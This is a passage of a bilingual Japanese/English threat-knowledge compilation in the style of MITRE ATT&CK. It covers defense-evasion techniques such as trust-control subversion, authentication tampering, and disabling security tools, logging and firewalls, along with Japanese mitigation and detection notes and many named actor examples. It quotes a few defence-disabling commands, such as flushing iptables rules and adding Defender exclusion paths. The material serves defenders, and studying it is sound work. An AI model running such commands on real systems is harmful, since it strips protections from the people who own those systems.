Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`. 敵対者は、ドメイン/テナントの信頼関係を改変することがある。Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources. These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 ドメイン/テナントポリシーの変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、コード署名やGatekeeper等の信頼制御を破壊して悪意あるコードを許可させることがある。 Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site. 敵対者は、macOSのGatekeeperを回避して未署名コードを実行することがある。Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications. 敵対者は、コード署名を悪用して信頼を装うことがある。Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature, this activity will result in a valid signature. 敵対者は、SIPや信頼プロバイダを乗っ取って署名検証を回避することがある。Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. 敵対者は、不正なルート証明書をインストールして信頼を悪用することがある。Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. 敵対者は、MOTWを回避してダウンロードファイルの警告を出させないことがある。Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW. Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it. 敵対者は、コード署名ポリシーを改変して未署名コードを許可させることがある。Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. レジストリキーの権限を制限し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 OSを安全に構成し、攻撃対象領域を縮小する。 許可されていないコードの実行を防止する。 ソフトウェアを安全に構成し、悪用を防ぐ。 信頼制御の破壊に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Axiom has used digital certificates to deliver malware. Shai-Hulud has suppressed victim NPM warnings using `process“exit’;` which results in having all errors exit with code 0. 敵対者は、認証メカニズムを改変して防御を妨害したり認証情報を取得したりすることがある。 Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using Valid Accounts. 敵対者は、ドメインコントローラの認証処理を改変することがある。Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. 敵対者は、パスワードフィルタDLLを登録して平文パスワードを取得することがある。Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 敵対者は、LinuxのPAMを改変して認証を回避・取得することがある。Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>. 敵対者は、ネットワーク機器の認証処理を改変することがある。Adversaries may use Patch System Image to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. 敵対者は、可逆暗号化を有効化してパスワード取得を容易にすることがある。An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it. 敵対者は、MFA設定を改変して回避することがある。Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts. 敵対者は、ハイブリッドID基盤の認証処理を改変することがある。Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. 敵対者は、ネットワークプロバイダDLLを悪用して認証情報を取得することがある。Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions. During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening. 敵対者は、条件付きアクセスポリシーを改変して認証制御を回避することがある。Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 レジストリキーの権限を制限し、不正な改変を防ぐ。 特権プロセスの完全性を保護し、不正なコード注入を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 OSを安全に構成し、攻撃対象領域を縮小する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 認証プロセスの変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 ArcaneDoor included modification of the AAA process to bypass authentication mechanisms. FIN13 has replaced legitimate KeePass binaries with trojanized versions to collect passwords from numerous applications. Ebury can intercept private keys using a trojanized <code>ssh-add</code> function. Kessel has trojanized the <sode>ssh_login</code> and <code>user-auth_pubkey</code> functions to steal plaintext credentials. SILENTTRINITY can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook. DRYHOOK has intercepted and logged user credentials by modifying the Perl module in Ivanti Connect Secure VPN edge-devices located within `/home/perl/DSAuth.pm`. 敵対者は、クラウドのコンピュートインフラ（スナップショット・インスタンス等）を改変して防御を妨害することがある。 An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots. 敵対者は、クラウドのスナップショットを作成して防御を回避することがある。An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in Revert Cloud Instance where an adversary may revert to a snapshot to evade detection and remove evidence of their presence. 敵対者は、新規クラウドインスタンスを作成して防御を回避することがある。An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may Create Snapshot of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect Data from Local System or for Remote Data Staging. 敵対者は、クラウドインスタンスを削除して痕跡を消すことがある。An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable. 敵対者は、クラウドインスタンスを以前の状態へ復元して痕跡を消すことがある。An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs. 敵対者は、クラウドのコンピュート構成を改変して防御を妨害することがある。Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim. アカウントの作成・権限・ライフサイクルを適切に管理する。 システムやアカウントを監査し、不正な活動を検出する。 クラウドコンピュートインフラの変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、ネットワーク境界機器を侵害してセグメント間を橋渡しし、防御を回避することがある。 Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. 敵対者は、NATトラバーサルを悪用してネットワーク境界を橋渡しすることがある。Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 認証情報の保存領域へのアクセスを保護する。 ネットワーク境界のブリッジに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Indian Critical Infrastructure Intrusions involved the use of FRP to bridge network boundaries and overcome NAT. Indian Critical Infrastructure Intrusions also involved the use of VPN tunnels with a potentially compromised MSP entity allowing for direct access to critical infrastructure entity networks. APT41 used `NATBypass` to bypass firewall restrictions and to access compromised systems via RDP. 敵対者は、暗号の鍵空間縮小やハードウェア無効化により暗号化を脆弱化することがある。 Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. 敵対者は、暗号の鍵空間を縮小して解読を容易にすることがある。Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications. 敵対者は、暗号化ハードウェアを無効化して暗号を脆弱化することがある。Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data. 暗号化の脆弱化に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、ネットワーク機器等のシステムイメージを改変して防御を妨害することがある。 Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file. 敵対者は、システムイメージにパッチを当てて挙動を改変することがある。Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses. Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime. 敵対者は、システムイメージを旧版へダウングレードすることがある。Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 認証情報の保存領域へのアクセスを保護する。 コード署名を検証し、未署名・不正なコードの実行を防ぐ。 ブートの完全性を検証し、起動段階での改ざんを防ぐ。 システムイメージの変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 DRYHOOK has modified the Ivanti Connect Secure VPN authentication Perl module `DSAuth.pm` by reading its contents in the buffer, then finding and replacing select lines of code. 敵対者は、macOSのplistファイルを改変して防御を妨害したり挙動を変えたりすることがある。 Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 plistファイルの変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 In older versions, XCSSET uses the <code>plutil</code> command to modify the <code>LSUIElement</code>, <code>DFBundleDisplayName</code>, and <code>CFBundleIdentifier</code> keys in the <code>/Contents/Info.plist</code> file to change how XCSSET is visible on the system. In later versions, XCSSET leverages a third-party notarized `dockutil` tool to modify the `.plist` file responsible for presenting applications to the user in the Dock and LaunchPad to point to a malicious application. Cuckoo Stealer can create and populate property list (plist) files to enable execution. 敵対者は、クラウドのリソース階層（組織・サブスクリプション等）を改変して防御を妨害することがある。 Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses. アカウントの作成・権限・ライフサイクルを適切に管理する。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを安全に構成し、悪用を防ぐ。 クラウドリソース階層の変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、セキュリティツールやログ記録を無効化・改変して検知を妨害することがある。（v19で旧T1562から再編） Adversaries may disable, degrade, or tamper with security tools or applications (e.g., endpoint detection and response (EDR) tools, intrusion detection systems (IDS), antivirus, logging agents, sensors, etc.) to impair or reduce visibility of defensive capabilities. This may include stopping specific services, killing processes, modifying or deleting tool configuration files and Registry keys, or preventing tools from updating. This may also include impairing defenses more broadly by disrupting preventative, detection, and response mechanisms across host, network, and cloud environments. 敵対者は、Windowsイベントログを無効化・改変することがある。Adversaries may disable or modify the Windows Event Log to limit data that can be leveraged for detections and audits. Windows Event Log records user and system activity such as login attempts and process creation. This data is used by security tools and analysts to generate detections. 敵対者は、クラウドのログ記録を無効化・改変することがある。An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities. 敵対者は、セキュリティツールのUIを改変・偽装して誤認させることがある。Adversaries may spoof or manipulate security tool user interfaces (UIs) to falsely indicate tools are functioning normally and delay detection and response. 敵対者は、Linuxの監査システム（auditd）ログを無効化・改変することがある。Adversaries may disable or modify the Linux Audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules. 敵対者は、Windowsイベントログを消去して痕跡を消すことがある。Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit. 敵対者は、Linux/macOSのシステムログを消去して痕跡を消すことがある。Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the `/var/log/` directory. Subfolders in this directory categorize logs by their related functions, such as: アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 レジストリキーの権限を制限し、不正な改変を防ぐ。 許可されていないコードの実行を防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを安全に構成し、悪用を防ぐ。 ツールの無効化/変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors disabled anti-virus and anti-spyware tools in some instances on the victim’s machines. The actors also disabled proxy settings to allow direct communication from victims to the Internet. During the SolarWinds Compromise, APT29 used the service control manager on a remote system to disable services associated with security monitoring products. During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry internet settings to lower internet security. During Cutting Edge, threat actors disabled logging and modified the `compcheckresult.cgi` component to edit the Ivanti Connect Secure built-in Integrity Checker exclusion list to evade detection. KV Botnet Activity used various scripts to remove or disable security tools, such as <code>http_watchdog</code> and <code>firewallsd</code>, as well as tools related to other botnet infections, such as <code>mips_ff</code>, on victim devices. During HomeLand Justice, threat actors modified and disabled components of endpoint detection and response (EDR) solutions including Microsoft Defender Antivirus. ArcaneDoor modified the Authentication, Authorization, and Accounting (AAA) function of targeted Cisco ASA appliances to allow the threat actor to bypass normal AAA operations. Quad7 Activity has disabled the TP-Link management interface for TP-Link by killing the <code>/usr/bin/httpd</code> process. During SharePoint ToolShell Exploitation, threat actors disabled Microsoft Defender through Registry settings and real-time monitoring via PowerShell. Turla has used a AMSI bypass, which patches the in-memory amsi.dll, in PowerShell scripts to bypass Windows antimalware products. Malware used by Putter Panda attempts to terminate processes corresponding to two components of Sophos Anti-Virus (SAVAdminService.exe and SavService.exe). Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.. FIN6 has deployed a utility script named <code>kill.bat</code> to disable anti-virus. Gamaredon Group has delivered macros which can tamper with Microsoft Office security settings. Magic Hound has disabled antivirus services on targeted systems in order to upload malicious payloads. BRONZE BUTLER has incorporated code into several tools that attempts to terminate anti-virus processes. MuddyWater can disable the system's local proxy settings. Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the <code>taskkill</code> command. APT38 has unhooked DLLs to disable endpoint detection and response (EDR) or anti-virus (AV) tools. TA505 has used malware to disable Windows Defender. Kimsuky has been observed turning off Windows Security Center and can hide the AV software window from the view of the infected user. APT41 developed a custom injector that enables an Event Tracing for Windows (ETW) bypass, making malicious processes invisible to Windows logging. Wizard Spider has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing. Rocke used scripts which detected and uninstalled antivirus software. Indrik Spider used PsExec to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring. Indrik Spider has used `MpCmdRun` to revert the definitions in Microsoft Defender. Additionally, Indrik Spider has used WMI to stop or uninstall and reset anti-virus products and other defensive services. TeamTNT has disabled and uninstalled security tools such as Alibaba, Tencent, and BMC cloud monitoring agents on cloud-based infrastructure. Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools on compromised systems. Scattered Spider has uninstalled and disabled security tools. TA2541 has attempted to disable built-in security protections such as Windows AMSI. APT5 has used the CLEANPULSE utility to insert command line strings into a targeted process to prevent certain log events from occurring. Akira has disabled or modified security tools for defense evasion. Agrius used several mechanisms to try to disable security tools. Agrius attempted to modify EDR-related services to disable auto-start on system reboot. Agrius used a publicly available driver, <code>GMER64.sys</code> typically used for anti-rootkit functionality, to selectively stop and remove security software processes. Saint Bear will modify registry entries and scheduled task objects associated with Windows Defender to disable its functionality. INC Ransom can use SystemSettingsAdminFlows.exe, a native Windows utility, to disable Windows Defender. Play has used tools including GMER, IOBit, and PowerTool to disable antivirus software. BlackByte disabled security tools such as Windows Defender and the Raccine anti-ransomware tool during operations. Velvet Ant attempted to disable local security tools and endpoint detection and response (EDR) software during operations. UNC3886 has disabled OpenSSL digital signature verification of system files through corruption of boot files. Medusa Group has terminated antivirus services utilizing the gaze.exe executable and utilizing `psexec.exe`. Medusa Group has also leveraged I/O control codes (IOCTLs) for terminating and deleting processes of identified security tools. Contagious Interview has convinced victims to disable Docker and other container environments and run code on their machine natively in attempts to bypass container isolation and ensure device infection. MirrorFace has disabled Windows Defender in compromised environments. TinyZBot can disable Avira anti-virus. SslMM identifies and kills anti-malware processes. HDoor kills anti-virus found on the victim. Unknown Logger has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes. H1N1 kills and disables services for Windows Security Center, and Windows Defender. ChChes can alter the victim's proxy configuration. Cobalt Strike has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox. JPIN can lower security settings by changing Registry keys. POWERSTATS can disable Microsoft Office Protected View by changing Registry keys. NanHaiShu can change Internet Explorer settings to reduce warnings about malware activity. Gold Dragon terminates anti-malware processes if they’re found running on the system. Brave Prince terminates antimalware processes. RunningRAT kills antimalware running process. TrickBot can disable Windows Defender. Proton kills security tools like Wireshark that are running. Agent Tesla has the capability to kill any running analysis processes and AV software. DarkComet can disable Security Center functions like anti-virus. NanoCore can modify the victim's anti-virus. LockerGoga installation has been immediately preceded by a "task kill" command in order to disable anti-virus. Ebury can disable SELinux Role-Based Access Control and deactivate PAM modules. RobbinHood will search for Windows services that are associated with antivirus software on the system and kill the process. ZxShell can kill AV products' processes. Imminent Monitor has a feature to disable Windows Task Manager. Ryuk has stopped services related to anti-virus. Maze has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg. It has also disabled Windows Defender's Real-Time Monitoring feature and attempted to disable endpoint protection services. Metamorfo has a function to kill processes associated with defenses and can prevent certain processes from launching. Netwalker can detect and terminate active security software-related processes on infected systems. Skidmap has the ability to set SELinux to permissive mode. Goopy has the ability to disable Microsoft Outlook's security policies to disable macro warnings. Ragnar Locker has attempted to terminate/stop processes and services associated with endpoint security products. Bundlore can change browser security settings to enable extensions to be installed. Bundlore uses the <code>pkill cfprefsd</code> command to prevent users from inspecting processes. Carberp has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed. StrongPity can add directories used by the malware to the Windows Defender exclusions list to prevent detection. REvil can connect to and disable the Symantec server on the victim's network. Grandoreiro can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running. Bazar has manually loaded ntdll from disk in order to identity and remove API hooks set by security products. Egregor has disabled Windows Defender to evade protections. SUNBURST attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist. MegaCortex was used to kill endpoint security processes. Waterbear can hook the <code>ZwOpenProcess</code> and <code>GetExtendedTcpTable</code> APIs called by the process of a security product to hide PIDs and TCP records from detection. Pysa has the capability to stop antivirus services and disable Windows Defender. ThiefQuest uses the function <code>kill_unwanted</code> to obtain a list of running processes and kills each process matching a list of security related processes. Hildegard has modified DNS resolvers to evade DNS monitoring tools. Stuxnet reduces the integrity level of objects to allow write actions. EKANS stops processes related to security and management software. Conficker terminates various services related to system security and Windows. Clop can uninstall or disable security products. Babuk can stop anti-virus services on a compromised host. Avaddon looks for and attempts to stop anti-malware solutions. QakBot has the ability to modify the Registry to add its binaries to the Windows Defender exclusion list. Diavol can attempt to stop security software. KOCTOPUS will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials. WarzoneRAT can disarm Windows Defender during the UAC process to evade detection. Meteor can attempt to uninstall Kaspersky Antivirus or remove the Kaspersky license; it can also add all files and folders related to the attack to the Windows Defender exclusion list. WhisperGate can download and execute AdvancedRun.exe to disable the Windows Defender Theat Protection service and set an exclusion path for the C:\ drive. SILENTTRINITY's `amsiPatch.py` module can disable Antimalware Scan Interface (AMSI) functions. Donut can patch Antimalware Scan Interface (AMSI), Windows Lockdown Policy (WLDP), as well as exit-related Native API functions to avoid process termination. HermeticWiper has the ability to set the `HKLM:\SYSTEM\\CurrentControlSet\\Control\\CrashControl\CrashDumpEnabled` Registry key to `0` in order to disable crash dumps. macOS.OSAMiner has searched for the Activity Monitor process in the System Events process list and kills the process if running. macOS.OSAMiner also searches the operating system's `install.log` for apps matching its hardcoded list, killing all matching process names. Brute Ratel C4 has the ability to hide memory artifacts and to patch Event Tracing for Windows (ETW) and the Anti Malware Scan Interface (AMSI). Woody RAT has suppressed all error reporting by calling `SetErrorMode` with 0x8007 as a parameter. HUI Loader has the ability to disable Windows Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI) functions. DarkGate will terminate processes associated with several security software products if identified during execution. ZIPLINE can add itself to the exclusion list for the Ivanti Connect Secure Integrity Checker Tool if the `--exclude` parameter is passed by the `tar` process. Raspberry Robin can add an exception to Microsoft Defender that excludes the entire main drive from anti-malware scanning to evade detection. MultiLayer Wiper removes the Volume Shadow Copy (VSS) service from infected devices along with all present shadow copies. Mango contains an unused capability to block endpoint security solutions from loading user-mode code hooks via a DLL in a specified process by using the `UpdateProcThreadAttribute API` to set the `PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY` to `PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON` for an identified process. ShrinkLocker disables protectors used to secure the BitLocker encryption key on victim systems. BlackByte Ransomware adds .JS and .EXE extensions to the Microsoft Defender exclusion list. BlackByte Ransomware terminates and removes the Raccine anti-ransomware utility. BOLDMOVE can disable the Fortinet daemons `moglogd` and `syslogd` to evade detection and logging. LockBit 2.0 can disable firewall rules and anti-malware and monitoring software including Windows Defender. StealBit can configure processes to not display certain Windows error messages by through use of the `NtSetInformationProcess`. LockBit 3.0 can disable security tools to evade detection including Windows Defender. JumbledPath can impair logging on all devices used along its connection path to compromised hosts. XLoader loads a copy of NTDLL to evade hooks from security monitoring tools on this library. XLoader can add the path of its executable to the Microsoft Defender exclusion list. Lumma Stealer has attempted to bypass Windows Antimalware Scan Interface (AMSI) by removing the string “AmsiScanBuffer” from the “clr.dll” module in memory to prevent it from being called. SplatCloak has identified and disabled API callback features of Windows Defender and Kaspersky. RedLine Stealer can disable security software and update services. Qilin can terminate antivirus-related processes and services. Medusa Ransomware has terminated antivirus services utilizing the gaze.exe executable. Medusa Ransomware has also terminated antivirus services utilizing PowerShell scripts. Shai-Hulud has replaced DNS configuration from `/tmp/resolved.conf` in order to gain control of network-level control within CI environments and has flushed iptables rules using `sudo iptables -F OUTPUT` and `sudo iptables -F DOCKER-USER`. DRYHOOK has killed all instances of the `cgi-server` process in order for the modified Perl module to be activated. PHASEJAM has modified Ivanti Connect Secure appliances and blocks the system upgrades by altering the DSUpgrade.pm file. DCRAT can patch Microsoft’s Antimalware Scan Interface (AMSI) to evade detection. PureCrypter has executed `Set-MpPreference -ExclusionPath` to exclude files or folders from Windows Defender scans. SPAWNCHIMERA has modified the Ivanti Integrity Checker Tool to evade detection. LazyWiper can disable Microsoft Windows Defender Real-Time Monitoring with the `Set-MpPreference` cmdlet. 敵対者は、システムやクラウドのファイアウォールを無効化・改変して防御を妨害することがある。 Adversaries may disable or modify host-based or network firewalls to impair defensive mechanisms and enable further action. Once an adversary has gathered sufficient privileges, they can tamper with firewall services, policies, or rule sets to remove restrictions on inbound or outbound traffic. For example, this may include turning off firewall profiles, altering existing rules to permit previously blocked ports or protocols, or adding new rules that create covert communication paths (e.g., adding a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port. 敵対者は、クラウドのファイアウォールを無効化・改変することがある。Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. 敵対者は、ネットワーク機器のファイアウォールを無効化・改変することがある。Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage. 敵対者は、Windowsホストのファイアウォールを無効化・改変することがある。Adversaries may disable or modify the Windows host firewall to bypass controls limiting network usage. This can include disabling the Windows host firewall entirely, suppressing specific profiles (domain, private, public), or adding, deleting, and modifying firewall rules to allow or restrict traffic. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 レジストリキーの権限を制限し、不正な改変を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 システムファイアウォールの無効化/変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the SolarWinds Compromise, APT29 used `netsh` to configure firewall rules that limited certain UDP outbound packets. Leviathan modified system firewalls to add two open listening ports on 9998 and 9999 during Leviathan Australian Intrusions. Carbanak may use netsh to add local firewall rule exceptions. Dragonfly has disabled host-based firewalls. The group has also globally opened port 3389. FIN7 has added a firewall rule to allow TCP port 59999 inbound and a rule to allow sshd.exe on TCP port 9898. APT38 have created firewall exemptions on specific ports, including ports 443, 